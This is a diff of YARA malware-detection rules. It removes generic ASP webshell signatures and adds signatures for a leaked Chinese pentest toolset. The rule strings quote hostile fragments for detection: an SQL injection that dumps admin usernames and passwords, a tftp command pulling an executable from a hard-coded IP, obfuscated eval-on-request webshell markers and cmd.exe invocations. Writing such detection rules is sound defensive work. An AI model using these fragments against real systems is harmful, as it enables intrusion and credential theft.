-		$oo2 = "*/\").Replace(\"/*" wide ascii
+		$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii
+		$s1 = "scan web.exe" fullword wide
 
 	condition:
-		filesize < 100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and ( ( ( filesize < 100KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 20 ) ) or ( filesize < 5KB and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 5 or ( ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 3 ) ) ) or ( filesize < 700 and ( ( #o4 + #o5 + #o6 + #o7 + #o8 + #o9 ) > 3 or ( #m_multi_one1 + #m_multi_one2 + #m_multi_one3 + #m_multi_one4 + #m_multi_one5 ) > 2 ) ) ) or any of ( $asp_obf* ) ) or ( ( filesize < 100KB and ( ( #oo1 ) > 2 or $oo2 ) ) or ( filesize < 25KB and ( ( #oo1 ) > 1 ) ) or ( filesize < 1KB and ( ( #oo1 ) > 0 ) ) ) ) and not any of ( $m_fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 3680KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Generic_Eval_On_Input : FILE
+rule SIGNATURE_BASE_CN_Honker_Mempodipper2_6 : FILE
 {
 	meta:
-		description = "Generic ASP webshell which uses any eval/exec function directly on user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0904cefb-6e0f-5e5f-9986-cf83d409ce46"
-		date = "2021-01-07"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3370-L3474"
+		description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
+		author = "Florian Roth (Nextron Systems)"
+		id = "43a27968-adab-5f27-9b8c-8f0f895f0576"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L189-L203"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d6b96d844ac395358ee38d4524105d331af42ede"
-		hash = "9be2088d5c3bfad9e8dfa2d7d7ba7834030c7407"
-		hash = "a1df4cfb978567c4d1c353e988915c25c19a0e4a"
-		hash = "069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6"
-		logic_hash = "f7b9f43cf2fd6d08b7438f003242e9a19dcea282959c7a1fdff3a35e261a031e"
-		score = 75
-		quality = -24
+		hash = "ba2c79911fe48660898039591e1742b3f1a9e923"
+		logic_hash = "1a2c42757199818b94a73b9faff3380911655992ef3214a33a220eac15850c4b"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$payload_and_input0 = /\beval_r\s{0,20}\(Request\(/ nocase wide ascii
-		$payload_and_input1 = /\beval[\s\(]{1,20}request[.\(\[]/ nocase wide ascii
-		$payload_and_input2 = /\bexecute[\s\(]{1,20}request\(/ nocase wide ascii
-		$payload_and_input4 = /\bExecuteGlobal\s{1,20}request\(/ nocase wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii
 
 	condition:
-		( filesize < 1100KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $payload_and_input* ) ) or ( filesize < 100 and any of ( $payload_and_input* ) )
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Nano : FILE
+rule SIGNATURE_BASE_CN_Honker_COOKIE_Cookie : FILE
 {
 	meta:
-		description = "Generic ASP webshell which uses any eval/exec function"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5f2f24c2-159d-51e1-80d9-11eeb77e8760"
-		date = "2021-01-13"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3476-L3667"
+		description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L205-L220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3b7910a499c603715b083ddb6f881c1a0a3a924d"
-		hash = "990e3f129b8ba409a819705276f8fa845b95dad0"
-		hash = "22345e956bce23304f5e8e356c423cee60b0912c"
-		hash = "c84a6098fbd89bd085526b220d0a3f9ab505bcba"
-		hash = "b977c0ad20dc738b5dacda51ec8da718301a75d7"
-		hash = "c69df00b57fd127c7d4e0e2a40d2f6c3056e0af8bfb1925938060b7e0d8c630f"
-		hash = "f3b39a5da1cdde9acde077208e8e5b27feb973514dab7f262c7c6b2f8f11eaa7"
-		hash = "0e9d92807d990144c637d8b081a6a90a74f15c7337522874cf6317092ea2d7c1"
-		hash = "ebbc485e778f8e559ef9c66f55bb01dc4f5dcce9c31ccdd150e2c702c4b5d9e1"
-		hash = "44b4068bfbbb8961e16bae238ad23d181ac9c8e4fcb4b09a66bbcd934d2d39ee"
-		hash = "c5a4e188780b5513f34824904d56bf6e364979af6782417ccc5e5a8a70b4a95a"
-		hash = "41a3cc668517ec207c990078bccfc877e239b12a7ff2abe55ff68352f76e819c"
-		hash = "2faad5944142395794e5e6b90a34a6204412161f45e130aeb9c00eff764f65fc"
-		hash = "d0c5e641120b8ea70a363529843d9f393074c54af87913b3ab635189fb0c84cb"
-		hash = "28cfcfe28419a399c606bf96505bc68d6fe05624dba18306993f9fe0d398fbe1"
-		logic_hash = "1b969e098a0b2c86ceba9cbb7f31770ba04f1a4c225716ea27d7e4e4177c90c4"
-		score = 75
-		quality = -142
+		hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
+		logic_hash = "6d942e53a253cb157e535f86ca457c93a6039b2c5ebb3969dc3e271242b478d4"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$susasp1 = "/*-/*-*/"
-		$susasp2 = "(\"%1"
-		$susasp3 = /[Cc]hr\([Ss]tr\(/
-		$susasp4 = "cmd.exe"
-		$susasp5 = "cmd /c"
-		$susasp7 = "FromBase64String"
-		$susasp8 = "UmVxdWVzdC"
-		$susasp9 = "cmVxdWVzdA"
-		$susasp10 = "/*//*/"
-		$susasp11 = "(\"/*/\""
-		$susasp12 = "eval(eval("
-		$fp1 = "eval a"
-		$fp2 = "'Eval'"
-		$fp3 = "Eval(\""
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
-		$asp_payload0 = "eval_r" fullword nocase wide ascii
-		$asp_payload1 = /\beval\s/ nocase wide ascii
-		$asp_payload2 = /\beval\(/ nocase wide ascii
-		$asp_payload3 = /\beval\"\"/ nocase wide ascii
-		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
-		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
-		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
-		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
-		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
-		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
-		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
-		$asp_multi_payload_one2 = "addcode" fullword wide ascii
-		$asp_multi_payload_one3 = /\.run\b/ wide ascii
-		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
-		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
-		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
-		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
-		$asp_multi_payload_three2 = "Process" fullword wide ascii
-		$asp_multi_payload_three3 = ".Start" wide ascii
-		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
-		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
-		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
-		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
-		$asp_multi_payload_five2 = ".Start" nocase wide ascii
-		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
-		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
-		$asp_always_write1 = /\.write/ nocase wide ascii
-		$asp_always_write2 = /\.swrite/ nocase wide ascii
-		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
-		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
-		$asp_cr_write1 = "CreateObject(" nocase wide ascii
-		$asp_cr_write2 = "CreateObject (" nocase wide ascii
-		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
-		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
+		$s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii
+		$s5 = "CooKie.exe" fullword wide
 
 	condition:
-		(( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) and not any of ( $fp* ) and ( filesize < 200 or ( filesize < 1000 and any of ( $susasp* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded : FILE
+rule SIGNATURE_BASE_CN_Honker_Wwwscan_1_Wwwscan : FILE
 {
 	meta:
-		description = "Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "67c0e1f6-6da5-569c-ab61-8b8607429471"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3669-L3779"
+		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L222-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1bc7327f9d3dbff488e5b0b69a1b39dcb99b3399"
-		hash = "9885ee1952b5ad9f84176c9570ad4f0e32461c92"
-		hash = "27a020c5bc0dbabe889f436271df129627b02196"
-		hash = "f41f8c82b155c3110fc1325e82b9ee92b741028b"
-		hash = "af40f4c36e3723236c59dc02f28a3efb047d67dd"
-		logic_hash = "dc33423874a49edfe9994db50959e6a55e2d475f4cd7d0b1b0a288c4ee1f7961"
-		score = 75
-		quality = -49
+		hash = "6bed45629c5e54986f2d27cbfc53464108911026"
+		logic_hash = "7b0b6bbcba49c8f950ea3cf5a364059ba784c87a41eba6d825a9ca4e3a07bfbc"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$encoded1 = "VBScript.Encode" nocase wide ascii
-		$encoded2 = "JScript.Encode" nocase wide ascii
-		$data1 = "#@~^" wide ascii
-		$sus1 = "shell" nocase wide ascii
-		$sus2 = "cmd" fullword wide ascii
-		$sus3 = "password" fullword wide ascii
-		$sus4 = "UserPass" fullword wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+		$s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
 
 	condition:
-		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and any of ( $encoded* ) and any of ( $data* ) and ( any of ( $sus* ) or ( filesize < 20KB and #data1 > 4 ) or ( filesize < 700 and #data1 > 0 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Encoded_Aspcoding : FILE
+rule SIGNATURE_BASE_CN_Honker_D_Injection_V2_32 : FILE
 {
 	meta:
-		description = "ASP Webshell encoded using ASPEncodeDLL.AspCoding"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "788a8dae-bcb8-547c-ba17-e1f14bc28f34"
-		date = "2021-03-14"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3781-L3887"
+		description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L239-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7cfd184ab099c4d60b13457140493b49c8ba61ee"
-		hash = "f5095345ee085318235c11ae5869ae564d636a5342868d0935de7582ba3c7d7a"
-		logic_hash = "a0f0b8585b28b13a90c5d112997cacea00af8c89c81eda5edf05508ad41459ab"
-		score = 60
-		quality = -30
+		hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		logic_hash = "0107903a481b09faa92a5fbb162fd981f976ed864be3a0840b43063461e20974"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$encoded1 = "ASPEncodeDLL" fullword nocase wide ascii
-		$encoded2 = ".Runt" nocase wide ascii
-		$encoded3 = "Request" fullword nocase wide ascii
-		$encoded4 = "Response" fullword nocase wide ascii
-		$data1 = "AspCoding.EnCode" wide ascii
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
-		$jsp6 = "getValue" fullword wide ascii
-		$jsp7 = "getBytes" fullword wide ascii
-		$perl1 = "PerlScript" fullword
+		$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide
+		$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
 
 	condition:
-		filesize < 500KB and ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and all of ( $encoded* ) and any of ( $data* )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_By_String : FILE
+rule SIGNATURE_BASE_CN_Honker_Net_Priv_Esc2 : FILE
 {
 	meta:
-		description = "Known ASP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4705b28b-2ffa-53d1-b727-1a9fc2a7dd69"
-		date = "2021-01-13"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L3889-L4067"
+		description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L256-L271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f72252b13d7ded46f0a206f63a1c19a66449f216"
-		hash = "bd75ac9a1d1f6bcb9a2c82b13ea28c0238360b3a7be909b2ed19d3c96e519d3d"
-		hash = "56a54fe1f8023455800fd0740037d806709ffb9ece1eb9e7486ad3c3e3608d45"
-		hash = "4ef5d8b51f13b36ce7047e373159d7bb42ca6c9da30fad22e083ab19364c9985"
-		hash = "e90c3c270a44575c68d269b6cf78de14222f2cbc5fdfb07b9995eb567d906220"
-		hash = "8a38835f179e71111663b19baade78cc3c9e1f6fcc87eb35009cbd09393cbc53"
-		hash = "f2883e9461393b33feed4139c0fc10fcc72ff92924249eb7be83cb5b76f0f4ee"
-		hash = "10cca59c7112dfb1c9104d352e0504f842efd4e05b228b6f34c2d4e13ffd0eb6"
-		hash = "ed179e5d4d365b0332e9ffca83f66ee0afe1f1b5ac3c656ccd08179170a4d9f7"
-		hash = "ce3273e98e478a7e95fccce0a3d3e8135c234a46f305867f2deacd4f0efa7338"
-		hash = "65543373b8bd7656478fdf9ceeacb8490ff8976b1fefc754cd35c89940225bcf"
-		hash = "de173ea8dcef777368089504a4af0804864295b75e51794038a6d70f2bcfc6f5"
-		logic_hash = "b6ff83bc501753b893a0f5e60c6aafa292617279c0855ce3ba2d0b9b73325e8a"
-		score = 75
-		quality = -66
+		hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
+		logic_hash = "53cf3d984bc82428eb0a6ee416bcd5429718a1d615ce1c1ba399cda42268d26c"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$asp_string1 = "tseuqer lave" wide ascii
-		$asp_string2 = ":eval request(" wide ascii
-		$asp_string3 = ":eval request(" wide ascii
-		$asp_string4 = "SItEuRl=\"http://www.zjjv.com\"" wide ascii
-		$asp_string5 = "ServerVariables(\"HTTP_HOST\"),\"gov.cn\"" wide ascii
-		$asp_string6 = /e\+.-v\+.-a\+.-l/ wide ascii
-		$asp_string7 = "r+x-e+x-q+x-u" wide ascii
-		$asp_string8 = "add6bb58e139be10" fullword wide ascii
-		$asp_string9 = "WebAdmin2Y.x.y(\"" wide ascii
-		$asp_string10 = "<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request[" wide ascii
-		$asp_string11 = "<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request(" wide ascii
-		$asp_string12 = "UmVxdWVzdC5JdGVtWyJ" wide ascii
-		$asp_string13 = "UAdgBhAGwAKA" wide ascii
-		$asp_string14 = "lAHYAYQBsACgA" wide ascii
-		$asp_string15 = "ZQB2AGEAbAAoA" wide ascii
-		$asp_string16 = "IAZQBxAHUAZQBzAHQAKA" wide ascii
-		$asp_string17 = "yAGUAcQB1AGUAcwB0ACgA" wide ascii
-		$asp_string18 = "cgBlAHEAdQBlAHMAdAAoA" wide ascii
-		$asp_string19 = "\"ev\"&\"al" wide ascii
-		$asp_string20 = "\"Sc\"&\"ri\"&\"p" wide ascii
-		$asp_string21 = "C\"&\"ont\"&\"" wide ascii
-		$asp_string22 = "\"vb\"&\"sc" wide ascii
-		$asp_string23 = "\"A\"&\"do\"&\"d" wide ascii
-		$asp_string24 = "St\"&\"re\"&\"am\"" wide ascii
-		$asp_string25 = "*/eval(" wide ascii
-		$asp_string26 = "\"e\"&\"v\"&\"a\"&\"l" nocase
-		$asp_string27 = "<%eval\"\"&(\"" nocase wide ascii
-		$asp_string28 = "6877656D2B736972786677752B237E232C2A" wide ascii
-		$asp_string29 = "ws\"&\"cript.shell" wide ascii
-		$asp_string30 = "SerVer.CreAtEoBjECT(\"ADODB.Stream\")" wide ascii
-		$asp_string31 = "ASPShell - web based shell" wide ascii
-		$asp_string32 = "<++ CmdAsp.asp ++>" wide ascii
-		$asp_string33 = "\"scr\"&\"ipt\"" wide ascii
-		$asp_string34 = "Regex regImg = new Regex(\"[a-z|A-Z]{1}:\\\\\\\\[a-z|A-Z| |0-9|\\u4e00-\\u9fa5|\\\\~|\\\\\\\\|_|{|}|\\\\.]*\");" wide ascii
-		$asp_string35 = "\"she\"&\"ll." wide ascii
-		$asp_string36 = "LH\"&\"TTP" wide ascii
-		$asp_string37 = "<title>Web Sniffer</title>" wide ascii
-		$asp_string38 = "<title>WebSniff" wide ascii
-		$asp_string39 = "cript\"&\"ing" wide ascii
-		$asp_string40 = "tcejbOmetsySeliF.gnitpircS" wide ascii
-		$asp_string41 = "tcejbOetaerC.revreS" wide ascii
-		$asp_string42 = "This file is part of A Black Path Toward The Sun (\"ABPTTS\")" wide ascii
